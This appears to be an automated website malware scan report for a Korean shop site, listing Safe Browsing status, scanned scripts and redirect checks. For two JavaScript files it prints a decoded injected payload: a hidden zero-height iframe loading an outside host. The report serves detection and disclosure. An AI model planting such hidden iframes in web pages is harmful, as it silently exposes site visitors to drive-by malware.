Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iamhandmade.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.iamhandmade.co.kr/ | 200 OK Content-Length: 85181 Content-Type: text/html | clean |
http://www.iamhandmade.co.kr/jscript/common.js | 200 OK Content-Length: 23389 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (navigator.userAgent.toLowerCase().indexOf("msie") != -1) {
try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} } String.prototype.trim = function() { return this.replace(/(^[ \t\n\r]*)|([ \t\n\r]*$)/g,''); } String.prototype.stripspace = function() { return this.replace(/ /g, ''); } String.prototype.replaceAll = function(a, b) { var s = this; if (navigator.userAgent.toLowerCase().indexOf( Antivirus reports:
| ||
http://www.iamhandmade.co.kr/jscript/embed.js | 200 OK Content-Length: 3710 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function loadSwf(sUrl, sWidth, sHeight, sId, sAlign, sBgcolor, sWmode) {
if (typeof(sWidth) == "undefined") sWidth = ""; if (typeof(sHeight) == "undefined") sHeight = ""; if (typeof(sId) == "undefined") sId = "ShockwaveFlash"; if (typeof(sAlign) == "undefined") sAlign = ""; if (typeof(sBgcolor) == "undefined") sBgcolor = ""; if (typeof(sWmode) == "undefined") sWmode = "transparent"; var html = '' + '<object classid="clsid:d27cdb6e-ae6d-11cf-96 Decoded script: <iframe src=http://mirclinic.com/amzone/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://www.iamhandmade.co.kr/jscript/ajax.js | 200 OK Content-Length: 2458 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/jscript/json.js | 200 OK Content-Length: 5093 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/jscript/user_func.js | 200 OK Content-Length: 2641 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/sns/scrap.js | 200 OK Content-Length: 1437 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function openScrapSns(sns, url ) {
var objForm = document.getElementById("ScrapSns"); if (!objForm) { objForm = document.createElement("FORM"); objForm.id = "ScrapSns"; objForm.name = "ScrapSns"; objForm.method = "get"; objForm.target = "_blank"; objForm.action = "/sns/scrapSns.asp"; var objInput = document.createElement("INPUT"); objInput.type = "hidden"; objInput.id = "url"; objInput.name = "url" Decoded script: <iframe src=http://mirclinic.com/amzone/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://www.iamhandmade.co.kr/brandshop.asp | 200 OK Content-Length: 110107 Content-Type: text/html | clean |
http://www.iamhandmade.co.kr/jscript/floating.js | 200 OK Content-Length: 3863 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://www.iamhandmade.co.kr/blog/culture_main.asp | 200 OK Content-Length: 76967 Content-Type: text/html | clean |
http://www.iamhandmade.co.kr/blog/information_main.asp | 200 OK Content-Length: 63004 Content-Type: text/html | clean |
http://www.iamhandmade.co.kr/board/list.asp?board=notice | 200 OK Content-Length: 61423 Content-Type: text/html | clean |
http://www.iamhandmade.co.kr/admin/login.asp | 200 OK Content-Length: 3879 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iamhandmade.co.kr
Result:
GET / HTTP/1.1
Host: iamhandmade.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: iamhandmade.co.kr
Referer: http://www.google.com/search?q=iamhandmade.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iamhandmade.co.kr
Referer: http://www.google.com/search?q=iamhandmade.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.